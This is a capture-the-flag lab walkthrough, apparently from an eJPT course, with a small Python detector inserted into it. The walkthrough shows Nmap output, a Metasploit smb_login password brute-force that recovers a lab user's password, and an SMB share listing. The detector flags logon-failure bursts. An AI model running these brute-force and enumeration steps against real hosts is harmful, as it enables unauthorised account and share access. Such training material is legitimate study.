Welcome to the Exploitation CTF 2 lab of the eJPT course. This will be a guided walkthrough. Let’s get started!

Attacker IP: 10.10.40.2

Target IP: 10.3.29.184

So we have an SMB user who sounds like he has a weak password. Let’s run our Nmap scan and get started.

nmap -sV -sC 10.3.29.184

Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-15 02:21 IST
Nmap scan report for target.ine.local (10.3.29.184)
Host is up (0.0029s latency).
Not shown: 989 closed tcp ports (reset)
PORT      STATE SERVICE            VERSION

21/tcp    open  ftp                Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT

80/tcp    open  http               Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server

135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?

3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: WIN-M878Q9NE9S6
|   NetBIOS_Domain_Name: WIN-M878Q9NE9S6
|   NetBIOS_Computer_Name: WIN-M878Q9NE9S6
|   DNS_Domain_Name: WIN-M878Q9NE9S6
|   DNS_Computer_Name: WIN-M878Q9NE9S6
|   Product_Version: 6.3.9600
|_  System_Time: 2026-01-14T20:52:33+00:00
| ssl-cert: Subject: commonName=WIN-M878Q9NE9S6
| Not valid before: 2026-01-13T20:39:15
|_Not valid after:  2026-07-15T20:39:15
|_ssl-date: 2026-01-14T20:52:41+00:00; 0s from scanner time.

49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49167/tcp open  msrpc              Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-01-14T20:52:38
|_  start_date: 2026-01-14T20:39:13

We notice quite a few ports and services running, but we’re going to focus on enumerating the SMB user, since that’s what the task is focused on.

We can use Metasploit to brute-force the SMB user tom for access. Let’s start up Metasploit and search for the module smb_login. We’ll need to set a few options and then run the exploit.

service postgresql start && msfconsole -q

search smb_login

use 0
setg RHOSTS 10.3.29.184
set SMBUser tom
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
exploit
[+] 10.3.29.184:445       - 10.3.29.184:445 - Success: '.\tom:felipe'

Great, it worked. We found the password felipe for user tom. Let’s see where we can get with these credentials.
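For the blue-team side of the smb_login run above, here is an added example (not part of the walkthrough) that flags the pattern a defender would see on the target: a burst of failed network logons (Windows event 4625, logon type 3) for one account from one source, followed by a success (event 4624). The event records, IPs, account names and thresholds below are constructed.

```python
"""Detect an SMB password-guessing burst followed by a successful logon.

Added example, not code from the original walkthrough. It scans constructed
Windows Security events (4625 = failed logon, 4624 = successful logon,
LogonType 3 = network logon, which is what SMB authentication produces) and
flags a source that fails repeatedly against one account and then succeeds.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, event_id, account, source_ip, logon_type)
SAMPLE_EVENTS = [
    ("2026-01-14T20:50:01", 4625, "tom", "10.10.40.2", 3),
    ("2026-01-14T20:50:01", 4625, "tom", "10.10.40.2", 3),
    ("2026-01-14T20:50:02", 4625, "tom", "10.10.40.2", 3),
    ("2026-01-14T20:50:03", 4625, "tom", "10.10.40.2", 3),
    ("2026-01-14T20:50:03", 4625, "tom", "10.10.40.2", 3),
    ("2026-01-14T20:50:04", 4625, "tom", "10.10.40.2", 3),
    ("2026-01-14T20:50:05", 4624, "tom", "10.10.40.2", 3),  # guess succeeded
    ("2026-01-14T20:51:00", 4625, "alice", "10.10.40.7", 3),  # single typo, benign
    ("2026-01-14T20:51:30", 4625, "admin", "127.0.0.1", 2),  # console logon, ignored
]


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Return one alert per (source, account) pair that accumulated at least
    `threshold` network-logon failures inside a sliding `window`, noting
    whether a successful logon for that pair followed the burst."""
    failures = defaultdict(list)  # (src, account) -> failure times inside window
    alerts = {}                   # (src, account) -> alert dict
    for ts, event_id, account, src, logon_type in sorted(events):
        if logon_type != 3:       # only network logons (SMB/RPC), not console
            continue
        key = (src, account)
        when = datetime.fromisoformat(ts)
        if event_id == 4625:
            # keep only failures still inside the window, then add this one
            recent = [t for t in failures[key] if when - t <= window] + [when]
            failures[key] = recent
            if len(recent) >= threshold:
                alert = alerts.setdefault(key, {"source": src, "account": account,
                                                "failures": 0, "success_after": False})
                alert["failures"] = len(recent)
        elif event_id == 4624 and key in alerts:
            alerts[key]["success_after"] = True  # burst ended in a valid logon
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_EVENTS):
        print(alert)
```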

smbclient -L \\\\target.ine.local -U tom
Password for [WORKGROUP\tom]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        D$              Disk      Default share
        HRDocuments     Disk      
        IPC$            IPC       Remote IPC
        ITResources     Disk      
        print$          Disk      Printer Drivers